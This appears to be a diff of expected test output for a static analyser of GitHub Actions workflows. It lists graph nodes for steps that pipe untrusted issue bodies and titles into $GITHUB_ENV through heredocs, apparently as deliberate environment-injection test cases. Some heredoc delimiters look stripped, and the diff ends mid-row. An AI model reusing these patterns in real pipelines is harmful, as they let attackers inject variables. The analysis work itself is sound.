.github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho 
"status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| 
.github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| 
.github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:34:6 | Run Step | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << 
EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | 
.github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| 
.github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| 
.github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:1:1:89:29 | 
on: | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | 
@@ -292,11 +402,11 @@ cfgNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:1:1:33:14 | enter on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:1:1:89:29 | enter on: | +| .github/workflows/multiline.yml:1:1:89:29 | exit on: | +| .github/workflows/multiline.yml:1:1:89:29 | exit on: (normal) | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | 
@@ -305,9 +415,29 @@ cfgNodes | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -354,7 +484,7 @@ dfNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | 
@@ -363,9 +493,29 @@ dfNodes | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | 
@@ -413,7 +563,7 @@ nodeLocations | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | .github/workflows/multiline.yml:9:5:89:29 | .github/workflows/multiline.yml@9:5:89:29 | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | 
@@ -422,9 +572,29 @@ nodeLocations | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | 